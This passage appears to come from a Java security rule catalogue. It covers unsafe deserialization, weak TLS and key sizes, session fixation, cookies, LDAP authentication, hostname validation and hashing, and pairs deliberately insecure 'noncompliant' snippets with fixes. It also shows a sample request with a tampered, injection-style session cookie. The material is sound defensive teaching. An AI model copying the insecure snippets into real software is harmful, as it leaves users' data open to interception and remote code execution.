To limit the risk of falling victim to such an attack, ActiveMQ 5.12.2+ requires developers to explicitly whitelist the packages that can be exchanged using ObjectMessage.

Noncompliant code example

ActiveMQConnectionFactory factory = new ActiveMQConnectionFactory("tcp://localhost:61616");
factory.setTrustAllPackages(true); // Noncompliant

ActiveMQConnectionFactory factory = new ActiveMQConnectionFactory("tcp://localhost:61616");
// no call to factory.setTrustedPackages(...);

Compliant solution

ActiveMQConnectionFactory factory = new ActiveMQConnectionFactory("tcp://localhost:61616");
factory.setTrustedPackages(Arrays.asList("org.mypackage1", "org.mypackage2"));

Resources

java:S5876

Why is this an issue?

Session fixation attacks occur when an attacker can force a legitimate user to use a session ID that the attacker knows. To avoid fixation attacks, it is good practice to generate a new session each time a user authenticates and to delete or invalidate the existing session (the one possibly known to the attacker).

Noncompliant code example

In a Spring Security context, session fixation protection is enabled by default but can be disabled with the sessionFixation().none() method:

@Override
protected void configure(HttpSecurity http) throws Exception {
   http.sessionManagement()
     .sessionFixation().none(); // Noncompliant: the existing session will continue
}

Compliant solution

In a Spring Security context, session fixation protection can be enabled as follows:

@Override
protected void configure(HttpSecurity http) throws Exception {
  http.sessionManagement()
     .sessionFixation().newSession(); // Compliant: a new session is created without any of the attributes from the old session being copied over

  // or

  http.sessionManagement()
     .sessionFixation().migrateSession(); // Compliant: a new session is created, the old one is invalidated and the attributes from the old session are copied over.
}

Resources

java:S4423

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

To provide communication security over a network, SSL and TLS are generally used. However, it is important to note that the following protocols are all considered weak by the cryptographic community, and are officially deprecated:

  • SSL versions 1.0, 2.0 and 3.0
  • TLS versions 1.0 and 1.1

When these unsecured protocols are used, it is best practice to expect a breach: that a user or organization with malicious intent will perform mathematical attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it on a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in Java Cryptographic Extension

Code examples

Noncompliant code example

import javax.net.ssl.SSLContext;
import java.security.NoSuchAlgorithmException;

public static void main(String[] args) {
    try {
        SSLContext.getInstance("TLSv1.1"); // Noncompliant
    } catch (NoSuchAlgorithmException e) {
        // ...
    }
}

Compliant solution

import javax.net.ssl.SSLContext;
import java.security.NoSuchAlgorithmException;

public static void main(String[] args) {
    try {
        SSLContext.getInstance("TLSv1.2");
    } catch (NoSuchAlgorithmException e) {
        // ...
    }
}

How does this work?

As a rule of thumb, by default you should use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The best choices at the moment are the following.

Use TLS v1.2 or TLS v1.3

Even though TLS v1.3 is available, using TLS v1.2 is still considered good and secure practice by the cryptography community.

The use of TLS v1.2 ensures compatibility with a wide range of platforms and enables seamless communication between different systems that do not yet have TLS v1.3 support.

The only drawback arises when the framework in use is outdated: its TLS v1.2 settings may enable older cipher suites that are now deprecated as insecure.

On the other hand, TLS v1.3 removes support for older and weaker cryptographic algorithms, eliminates known vulnerabilities from previous TLS versions, and improves performance.
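Beyond choosing the context version, the list of enabled protocol versions can also be pinned explicitly on a connection. A minimal sketch (the method name modernParameters is illustrative):

```java
import javax.net.ssl.SSLContext;
import javax.net.ssl.SSLParameters;

public class TlsConfigExample {

    // Builds SSL parameters that only allow TLS v1.2 and v1.3,
    // excluding the deprecated SSL 3.0 / TLS 1.0 / TLS 1.1 versions.
    public static SSLParameters modernParameters() throws Exception {
        SSLContext context = SSLContext.getInstance("TLS");
        context.init(null, null, null); // default key and trust managers
        SSLParameters params = context.getDefaultSSLParameters();
        params.setProtocols(new String[] { "TLSv1.3", "TLSv1.2" });
        return params;
    }

    public static void main(String[] args) throws Exception {
        System.out.println(String.join(", ", modernParameters().getProtocols()));
    }
}
```

The resulting SSLParameters can then be applied to an SSLSocket or SSLEngine before the handshake.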

Resources

Articles & blog posts

Standards

java:S4544

Using an unsafe Jackson deserialization configuration is security-sensitive. It has led to vulnerabilities in the past.

When Jackson is configured to allow Polymorphic Type Handling (aka PTH), formerly known as Polymorphic Deserialization, "deserialization gadgets" may allow an attacker to perform remote code execution.

This rule raises an issue when:

  • enableDefaultTyping() is called on an instance of com.fasterxml.jackson.databind.ObjectMapper or org.codehaus.jackson.map.ObjectMapper.
  • or when the annotation @JsonTypeInfo is set at class, interface or field levels and configured with use = JsonTypeInfo.Id.CLASS or use = Id.MINIMAL_CLASS.

Ask Yourself Whether

  • You configured the Jackson deserializer as mentioned above.
  • The serialized data might come from an untrusted source.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use the latest patch versions of jackson-databind, which block the already discovered "deserialization gadgets".
  • Avoid using the default typing configuration: ObjectMapper.enableDefaultTyping().
  • If possible, use @JsonTypeInfo(use = Id.NAME) instead of @JsonTypeInfo(use = Id.CLASS) or @JsonTypeInfo(use = Id.MINIMAL_CLASS), and thus rely on @JsonTypeName and @JsonSubTypes.

Sensitive Code Example

ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping(); // Sensitive
@JsonTypeInfo(use = Id.CLASS) // Sensitive
abstract class PhoneNumber {
}
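The name-based typing recommended above can be sketched as follows, assuming jackson-databind is on the classpath (the class names NameBasedTyping and Landline and the "type" property are illustrative):

```java
import com.fasterxml.jackson.annotation.JsonSubTypes;
import com.fasterxml.jackson.annotation.JsonTypeInfo;
import com.fasterxml.jackson.annotation.JsonTypeName;
import com.fasterxml.jackson.databind.ObjectMapper;

public class NameBasedTyping {

    // Id.NAME resolves subtypes from the fixed @JsonSubTypes whitelist
    // instead of instantiating arbitrary attacker-supplied class names.
    @JsonTypeInfo(use = JsonTypeInfo.Id.NAME, property = "type")
    @JsonSubTypes({ @JsonSubTypes.Type(value = Landline.class, name = "landline") })
    public static abstract class PhoneNumber {
    }

    @JsonTypeName("landline")
    public static class Landline extends PhoneNumber {
        public String number;
    }

    public static void main(String[] args) throws Exception {
        ObjectMapper mapper = new ObjectMapper();
        PhoneNumber p = mapper.readValue(
                "{\"type\":\"landline\",\"number\":\"555-0100\"}", PhoneNumber.class);
        System.out.println(p instanceof Landline); // prints "true"
    }
}
```

A JSON document naming a type outside the whitelist is rejected with an exception instead of being instantiated.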

See

java:S2245

Using pseudorandom number generators (PRNGs) is security-sensitive. It has led to vulnerabilities in the past.

When software generates predictable values in a context requiring unpredictability, it may be possible for an attacker to guess the next value that will be generated, and use this guess to impersonate another user or access sensitive information.

As the java.util.Random class relies on a pseudorandom number generator, this class and the related java.lang.Math.random() method should not be used for security-critical applications or for protecting sensitive data. In such contexts, the java.security.SecureRandom class, which relies on a cryptographically strong random number generator (RNG), should be used instead.

Ask Yourself Whether

  • the code using the generated value requires it to be unpredictable. This is the case for all encryption mechanisms, or when a secret value, such as a password, is hashed.
  • the function you use generates a value which can be predicted (pseudo-random).
  • the generated value is used multiple times.
  • an attacker can access the generated value.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use a cryptographically strong random number generator (RNG) like "java.security.SecureRandom" in place of this PRNG.
  • Use the generated random values only once.
  • You should not expose the generated random value. If you have to store it, make sure that the database or file is secure.

Sensitive Code Example

Random random = new Random(); // Sensitive use of Random
byte[] bytes = new byte[20];
random.nextBytes(bytes); // Check if bytes is used for hashing, encryption, etc...

Compliant Solution

SecureRandom random = new SecureRandom(); // Compliant for security-sensitive use cases
byte[] bytes = new byte[20];
random.nextBytes(bytes);

See

java:S4426

This vulnerability exposes encrypted data to attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

In today’s cryptography, the length of the key directly affects the security level of cryptographic algorithms.

Note that depending on the algorithm, the term key refers to a different mathematical property. For example:

  • For RSA, the key is the product of two large prime numbers, also called the modulus.
  • For AES and Elliptic Curve Cryptography (ECC), the key is only a sequence of randomly generated bytes.
    • In some cases, AES keys are derived from a master key or a passphrase using a Key Derivation Function (KDF) such as PBKDF2 (Password-Based Key Derivation Function 2).
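The KDF approach mentioned above can be sketched with PBKDF2 from the JCE (the helper name deriveAesKey and the iteration count are illustrative choices):

```java
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;
import javax.crypto.spec.SecretKeySpec;
import java.security.SecureRandom;

public class KeyDerivationExample {

    // Derives a 128-bit AES key from a passphrase and a per-user random salt.
    public static SecretKeySpec deriveAesKey(char[] passphrase, byte[] salt) throws Exception {
        PBEKeySpec spec = new PBEKeySpec(passphrase, salt, 210_000, 128); // 128-bit key
        SecretKeyFactory factory = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA256");
        byte[] keyBytes = factory.generateSecret(spec).getEncoded();
        spec.clearPassword(); // avoid keeping the passphrase in memory
        return new SecretKeySpec(keyBytes, "AES");
    }

    public static void main(String[] args) throws Exception {
        byte[] salt = new byte[16];
        new SecureRandom().nextBytes(salt); // the salt must be stored alongside the derived key's use
        SecretKeySpec key = deriveAesKey("correct horse battery staple".toCharArray(), salt);
        System.out.println(key.getEncoded().length); // prints "16" (128 bits)
    }
}
```

The same passphrase and salt always yield the same key, which is what allows the key to be re-derived instead of stored.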

If an application uses a key that is considered short and insecure, the encrypted data is exposed to attacks aimed at getting at the plaintext.

In general, it is best practice to expect a breach: that a user or organization with malicious intent will perform cryptographic attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it on a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in Java Cryptographic Extension

Code examples

The following code examples either explicitly or implicitly generate keys. Note that there are differences in the size of the keys depending on the algorithm.

Due to the mathematical properties of the algorithms, the security requirements for the key size vary depending on the algorithm.
For example, a 256-bit ECC key provides about the same level of security as a 3072-bit RSA key and a 128-bit symmetric key.

Noncompliant code example

Here is an example of a private key generation with RSA:

import java.security.KeyPairGenerator;
import java.security.NoSuchAlgorithmException;

public static void main(String[] args) {
    try {
        KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("RSA");
        keyPairGenerator.initialize(1024); // Noncompliant

    } catch (NoSuchAlgorithmException e) {
        // ...
    }
}

Here is an example of a private key generation with AES:

import javax.crypto.KeyGenerator;
import java.security.NoSuchAlgorithmException;

public static void main(String[] args) {
    try {
        KeyGenerator keyGenerator = KeyGenerator.getInstance("AES");
        keyGenerator.init(64); // Noncompliant

    } catch (NoSuchAlgorithmException e) {
        // ...
    }
}

Here is an example of an Elliptic Curve (EC) initialization. It implicitly generates a private key whose size is indicated in the algorithm name:

import java.security.KeyPairGenerator;
import java.security.NoSuchAlgorithmException;
import java.security.InvalidAlgorithmParameterException;
import java.security.spec.ECGenParameterSpec;

public static void main(String[] args) {
    try {
        KeyPairGenerator keyPairGenerator    = KeyPairGenerator.getInstance("EC");
        ECGenParameterSpec ellipticCurveName = new ECGenParameterSpec("secp112r1"); // Noncompliant
        keyPairGenerator.initialize(ellipticCurveName);

    } catch (NoSuchAlgorithmException | InvalidAlgorithmParameterException e) {
        // ...
    }
}

Compliant solution

import java.security.KeyPairGenerator;
import java.security.NoSuchAlgorithmException;

public static void main(String[] args) {
    try {
        KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("RSA");
        keyPairGenerator.initialize(2048);

    } catch (NoSuchAlgorithmException e) {
        // ...
    }
}
import javax.crypto.KeyGenerator;
import java.security.NoSuchAlgorithmException;

public static void main(String[] args) {
    try {
        KeyGenerator keyGenerator = KeyGenerator.getInstance("AES");
        keyGenerator.init(128);

    } catch (NoSuchAlgorithmException e) {
        // ...
    }
}
import java.security.KeyPairGenerator;
import java.security.NoSuchAlgorithmException;
import java.security.InvalidAlgorithmParameterException;
import java.security.spec.ECGenParameterSpec;

public static void main(String[] args) {
    try {
        KeyPairGenerator keyPairGenerator    = KeyPairGenerator.getInstance("EC");
        ECGenParameterSpec ellipticCurveName = new ECGenParameterSpec("secp256r1");
        keyPairGenerator.initialize(ellipticCurveName);

    } catch (NoSuchAlgorithmException | InvalidAlgorithmParameterException e) {
        // ...
    }
}

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The appropriate choices are the following.

RSA (Rivest-Shamir-Adleman) and DSA (Digital Signature Algorithm)

The security of these algorithms depends on the difficulty of attacks attempting to solve their underlying mathematical problem.

In general, a minimum key size of 2048 bits is recommended for both.

AES (Advanced Encryption Standard)

AES supports three key sizes: 128 bits, 192 bits and 256 bits. The security of the AES algorithm is based on the computational complexity of trying all possible keys.
A larger key size increases the number of possible keys and makes exhaustive search attacks computationally infeasible. Therefore, a 256-bit key provides a higher level of security than a 128-bit or 192-bit key.

Currently, a minimum key size of 128 bits is recommended for AES.

Elliptic Curve Cryptography (ECC)

Elliptic curve cryptography is also used in various algorithms, such as ECDSA, ECDH, or ECMQV. The length of a key generated with an elliptic curve algorithm is indicated directly in its name. For example, secp256k1 generates a 256-bit private key.

Currently, a minimum key size of 224 bits is recommended for EC algorithms.

Going the extra mile

Pre-Quantum Cryptography

Encrypted data and communications recorded today could be decrypted in the future by an attack from a quantum computer.
It is important to keep in mind that NIST-approved digital signature schemes, key agreement, and key transport may need to be replaced with secure quantum-resistant (or "post-quantum") counterparts.

Thus, if data is to remain secure beyond 2030, proactive measures should be taken now to ensure its safety.


Resources

Articles & blog posts

Standards

java:S3330

When a cookie is configured with the HttpOnly attribute set to true, the browser guarantees that no client-side script will be able to read it. In most cases, when a cookie is created, the default value of HttpOnly is false, and it is up to the developer to decide whether the content of the cookie can be read by client-side scripts. As the majority of Cross-Site Scripting (XSS) attacks target the theft of session cookies, the HttpOnly attribute can help reduce their impact, since it will not be possible to exploit an XSS vulnerability to steal session cookies.

Ask Yourself Whether

  • the cookie is sensitive, used to authenticate the user, for instance a session cookie
  • the HttpOnly attribute offers additional protection (this is not the case for an XSRF-TOKEN cookie / CSRF token, for example)

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • By default, the HttpOnly flag should be set to true for most cookies; it is mandatory for session and other security-sensitive cookies.

Sensitive Code Example

If you create a security-sensitive cookie in your Java code:

Cookie c = new Cookie(COOKIENAME, sensitivedata);
c.setHttpOnly(false);  // Sensitive: the HttpOnly flag is set to false, so the cookie can easily be stolen through an XSS vulnerability

By default the HttpOnly flag is set to false:

Cookie c = new Cookie(COOKIENAME, sensitivedata);  // Sensitive: the HttpOnly flag is not defined (false by default), so the cookie can easily be stolen through an XSS vulnerability

Compliant Solution

Cookie c = new Cookie(COOKIENAME, sensitivedata);
c.setHttpOnly(true); // Compliant: this sensitive cookie is protected against theft (HttpOnly=true)

See

java:S4434

JNDI supports the deserialization of objects from LDAP directories, which can lead to remote code execution.

This rule raises an issue when an LDAP search query is executed with SearchControls configured to allow deserialization.

Ask Yourself Whether

  • The application connects to an untrusted LDAP directory.
  • User-controlled objects can be stored in the LDAP directory.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to disable deserialization of LDAP objects.

Sensitive Code Example

DirContext ctx = new InitialDirContext();
// ...
ctx.search(query, filter,
        new SearchControls(scope, countLimit, timeLimit, attributes,
            true, // Noncompliant; allows deserialization
            deref));

Compliant Solution

DirContext ctx = new InitialDirContext();
// ...
ctx.search(query, filter,
        new SearchControls(scope, countLimit, timeLimit, attributes,
            false, // Compliant
            deref));

See

java:S2257

The use of a non-standard algorithm is dangerous because a determined attacker may be able to break the algorithm and compromise whatever data has been protected. Standard algorithms like SHA-256, SHA-384, or SHA-512 should be used instead.

This rule tracks the creation of java.security.MessageDigest subclasses.

Recommended Secure Coding Practices

  • Use a standard algorithm instead of creating a custom one.

Sensitive Code Example

public class MyCryptographicAlgorithm extends MessageDigest {
  ...
}

Compliant Solution

MessageDigest digest = MessageDigest.getInstance("SHA-256");

See

java:S2254

Why is this an issue?

According to the Oracle Java API, the HttpServletRequest.getRequestedSessionId() method:

Returns the session ID specified by the client. This may not be the same as the ID of the current valid session for this request. If the client did not specify a session ID, this method returns null.

The session ID it returns is transmitted either in a cookie or in a URL parameter, so by definition, nothing prevents the end user from manually updating the value of this session ID in the HTTP request.

Here is an example of an updated HTTP header:

GET /pageSomeWhere HTTP/1.1
Host: webSite.com
User-Agent: Mozilla/5.0
Cookie: JSESSIONID=Hacked_Session_Value'''">

Due to the ability of the end user to manually change the value, the session ID in the request should only be used by a servlet container (e.g. Tomcat or Jetty) to check whether the value matches the ID of an existing session. If it does not, the user should be considered unauthenticated. Moreover, this session ID should never be logged as-is; log a one-way hash of it instead, to prevent hijacking of active sessions.
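The one-way-hash approach to logging can be sketched as follows (the class and helper names are illustrative):

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;

public class SessionIdLogging {

    // Hashes a session ID with SHA-256 so the raw value never reaches the logs;
    // the hex digest still lets log entries for the same session be correlated.
    public static String hashForLogging(String sessionId) throws Exception {
        MessageDigest digest = MessageDigest.getInstance("SHA-256");
        byte[] hash = digest.digest(sessionId.getBytes(StandardCharsets.UTF_8));
        StringBuilder hex = new StringBuilder();
        for (byte b : hash) {
            hex.append(String.format("%02x", b));
        }
        return hex.toString();
    }

    public static void main(String[] args) throws Exception {
        System.out.println(hashForLogging("abc"));
        // prints "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad"
    }
}
```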

Noncompliant code example

if (isActiveSession(request.getRequestedSessionId())) {
  // ...
}

Resources

java:S4433

Lightweight Directory Access Protocol (LDAP) servers provide two main authentication methods: SASL and Simple. The Simple Authentication method itself breaks down into three different mechanisms:

  • Anonymous Authentication
  • Unauthenticated Authentication
  • Name/Password Authentication

A server that accepts either the Anonymous or the Unauthenticated mechanism will accept connections from clients that do not provide credentials.

Why is this an issue?

When configured to accept the Anonymous or Unauthenticated authentication mechanism, an LDAP server will accept connections from clients that do not provide a password or other authentication credentials. Such users will be able to read or modify part or all of the data contained in the hosted directory.

What is the potential impact?

An attacker exploiting unauthenticated access to an LDAP server can access the data that is stored in the corresponding directory. The impact varies depending on the permission obtained on the directory and the type of data it stores.

Authentication bypass

If attackers get write access to the directory, they will be able to alter most of the data it stores. This might include sensitive technical data such as user passwords or asset configurations. Such an attack can typically lead to an authentication bypass on applications and systems that use the affected directory as an identity provider.

In such a case, all users configured in the directory might see their identity and privileges taken over.

Sensitive information leak

If attackers get read-only access to the directory, they will be able to read the data it stores. That data might include security-sensitive pieces of information.

Typically, attackers might get access to user account lists that they can use in further intrusion steps. For example, they could use such lists to perform password spraying, or related attacks, on all systems that rely on the affected directory as an identity provider.

If the directory contains some Personally Identifiable Information, an attacker accessing it might represent a violation of regulatory requirements in some countries. For example, this kind of security event would go against the European GDPR law.

How to fix it

Code examples

The following code indicates an anonymous LDAP authentication vulnerability because it binds to a remote server using an Anonymous Simple authentication mechanism.

Noncompliant code example

// Set up the environment for creating the initial context
Hashtable<String, Object> env = new Hashtable<String, Object>();
env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.ldap.LdapCtxFactory");
env.put(Context.PROVIDER_URL, "ldap://localhost:389/o=JNDITutorial");

// Use anonymous authentication
env.put(Context.SECURITY_AUTHENTICATION, "none"); // Noncompliant

// Create the initial context
DirContext ctx = new InitialDirContext(env);

Compliant solution

// Set up the environment for creating the initial context
Hashtable<String, Object> env = new Hashtable<String, Object>();
env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.ldap.LdapCtxFactory");
env.put(Context.PROVIDER_URL, "ldap://localhost:389/o=Example");

// Use simple authentication
env.put(Context.SECURITY_AUTHENTICATION, "simple");
env.put(Context.SECURITY_PRINCIPAL, "cn=local, ou=Unit, o=Example");
env.put(Context.SECURITY_CREDENTIALS, getLDAPPassword());

// Create the initial context
DirContext ctx = new InitialDirContext(env);

Resources

Documentation

Standards

java:S5527

This vulnerability allows attackers to impersonate a trusted host.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. In this process, the role of hostname validation, combined with certificate validation, is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When hostname validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

To do so, an attacker would obtain a valid certificate authenticating example.com, serve it using a different hostname, and the application code would still accept it.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable hostname validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate hostnames, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

How to fix it in Apache Commons Email

Code examples

The following code contains examples of disabled hostname validation.

Hostname validation is disabled because the call to setSSLCheckServerIdentity is omitted. To enable validation, call this method with true before enabling SSL.

Noncompliant code example

import org.apache.commons.mail.DefaultAuthenticator;
import org.apache.commons.mail.Email;
import org.apache.commons.mail.SimpleEmail;

public void sendMail(String message) {
    Email email = new SimpleEmail();

    email.setMsg(message);
    email.setSmtpPort(465);
    email.setAuthenticator(new DefaultAuthenticator(username, password));
    email.setSSLOnConnect(true); // Noncompliant

    email.send();
}

Compliant solution

import org.apache.commons.mail.DefaultAuthenticator;
import org.apache.commons.mail.Email;
import org.apache.commons.mail.SimpleEmail;

public void sendMail(String message) {
    Email email = new SimpleEmail();

    email.setMsg(message);
    email.setSmtpPort(465);
    email.setAuthenticator(new DefaultAuthenticator(username, password));
    email.setSSLCheckServerIdentity(true);
    email.setSSLOnConnect(true);

    email.send();
}

How does this work?

To fix the vulnerability of disabled hostname validation, it is strongly recommended to first re-enable the default validation and fix the root cause: the validity of the certificate.

Use valid certificates

If a hostname validation failure prevents connecting to the target server, keep in mind that one system’s code should not work around another system’s problems, as this creates unnecessary dependencies and can lead to reliability issues.

Therefore, the first solution is to change the remote host’s certificate to match its identity. If the remote host is not under your control, consider replicating its service to a server whose certificate you can change yourself.

If the contacted host is located on a development machine, and if there is no other choice, try the following solution:

  • Create a self-signed certificate for that machine.
  • Add this self-signed certificate to the system’s trust store.
  • If the hostname is not localhost, add the hostname in the /etc/hosts file.

Here is a sample command to import a certificate to the Java trust store:

keytool -import -alias myserver -file myserver.crt -keystore cacerts

Resources

Standards

java:S4790

Cryptographic hash algorithms such as MD2, MD4, MD5, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160 and SHA-1 are no longer considered secure, because it is possible to have collisions (little computational effort is enough to find two or more different inputs that produce the same hash).

Ask Yourself Whether

The hashed value is used in a security context like:

  • User-password storage.
  • Security token generation (used to confirm an e-mail address when registering on a website, to reset a password, etc.).
  • Message integrity computation.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Safer alternatives, such as SHA-256, SHA-512 and SHA-3, are recommended. For password hashing, it’s even better to use deliberately slow algorithms such as bcrypt, scrypt, Argon2 or PBKDF2, because their computational cost slows down brute-force attacks.

Sensitive Code Example

MessageDigest md1 = MessageDigest.getInstance("SHA");  // Sensitive:  SHA is not a standard name, for most security providers it's an alias of SHA-1
MessageDigest md2 = MessageDigest.getInstance("SHA1");  // Sensitive

Compliant Solution

MessageDigest md1 = MessageDigest.getInstance("SHA-512"); // Compliant
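The compliant hash above covers integrity use cases; for password storage, the recommendation above favors slow key-derivation functions. A minimal sketch using only Java SE’s built-in PBKDF2 implementation (the iteration count and salt size are illustrative choices, not prescriptions):

```java
import java.security.SecureRandom;
import java.security.spec.KeySpec;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;

public class PasswordHashing {
    public static byte[] hashPassword(char[] password, byte[] salt) throws Exception {
        // 210_000 iterations and a 256-bit key are illustrative values;
        // tune the iteration count to your hardware and security budget.
        KeySpec spec = new PBEKeySpec(password, salt, 210_000, 256);
        SecretKeyFactory factory = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA256");
        return factory.generateSecret(spec).getEncoded();
    }

    public static byte[] newSalt() {
        // A random per-user salt defeats precomputed (rainbow-table) attacks.
        byte[] salt = new byte[16];
        new SecureRandom().nextBytes(salt);
        return salt;
    }
}
```

Store the salt alongside the hash; the same password and salt always produce the same hash, so verification is a recomputation plus comparison.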

See

java:S4792

Configuring loggers is security-sensitive: logger misconfiguration has led to vulnerabilities in the past.

Logs are useful before, during and after a security incident.

  • Attackers will usually start their nefarious work by probing the system for vulnerabilities. Monitoring this activity and stopping it is the first step in preventing an attack from ever happening.
  • In case of a successful attack, logs should contain enough information to understand what damage an attacker may have inflicted.

Logs are also a target for attackers because they might contain sensitive information. Configuring loggers affects what information is logged and how it is logged.

This rule flags code that configures loggers so that it can be reviewed. The goal is to guide security code reviews.

Ask Yourself Whether

  • unauthorized users might have access to the logs, either because they are stored in an insecure location or because the application gives access to them.
  • the logs contain sensitive information on a production server. This can happen when the logger is in debug mode.
  • the logs can grow without limit. This can happen when additional information is written into the logs every time a user performs an action and the user can perform the action as many times as they want.
  • the logs do not contain enough information to understand the damage an attacker might have inflicted. The loggers’ levels (info, warn, error) might filter out important information, and contextual details such as the precise time of events or the server hostname might not be printed.
  • the logs are only stored locally instead of being backed up or replicated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Check that your production deployment doesn’t have its loggers in "debug" mode as it might write sensitive information in logs.
  • Production logs should be stored in a secure location which is only accessible to system administrators.
  • Configure the loggers to display all warnings, info and error messages. Write relevant information such as the precise time of events and the hostname.
  • Choose a log format that is easy to parse and process automatically. It is important to process logs rapidly in case of an attack so that the impact is known and limited.
  • Check that the permissions of the log files are correct. If you index the logs in some other service, make sure that the transfer and the service are secure too.
  • Add limits to the size of the logs and make sure that no user can fill the disk with logs. This can happen even when the user does not control the logged information. An attacker could just repeat a logged action many times.

Remember that configuring loggers properly doesn’t make them bullet-proof. Here is a list of recommendations on how to use your logs:

  • Don’t log any sensitive information. This obviously includes passwords and credit card numbers, but also any personal information such as user names, locations, etc. Usually, any information protected by law is a good candidate for removal.
  • Sanitize all user inputs before writing them to the logs. This includes checking their size, content, encoding, syntax, etc. As with any user input, validate using whitelists whenever possible. Letting users write whatever they want into your logs can have many impacts: it could, for example, exhaust your storage space or compromise your log indexing service.
  • Log enough information to monitor suspicious activities and evaluate the impact an attacker might have on your systems. Register events such as failed logins, successful logins, server side input validation failures, access denials and any important transaction.
  • Monitor the logs for any suspicious activity.
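The sanitization point above can be sketched as follows (the class and method names, the replacement character, and the 256-character cap are all illustrative choices): stripping CR/LF characters prevents an attacker from forging extra log lines (log injection), and capping the length keeps a single request from flooding the log.

```java
public class LogSanitizer {
    // Replace line breaks so user input cannot forge additional log entries,
    // and cap the length so a single request cannot flood the log.
    public static String sanitize(String userInput) {
        if (userInput == null) {
            return "";
        }
        String cleaned = userInput.replaceAll("[\r\n]", "_");
        return cleaned.length() > 256 ? cleaned.substring(0, 256) : cleaned;
    }
}
```

Usage would be e.g. `logger.info("login attempt for {}", LogSanitizer.sanitize(username));`.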

Sensitive Code Example

This rule supports the following libraries: Log4J, java.util.logging and Logback

// === Log4J 2 ===
import org.apache.logging.log4j.core.config.builder.api.ConfigurationBuilderFactory;
import org.apache.logging.log4j.Level;
import org.apache.logging.log4j.core.*;
import org.apache.logging.log4j.core.config.*;

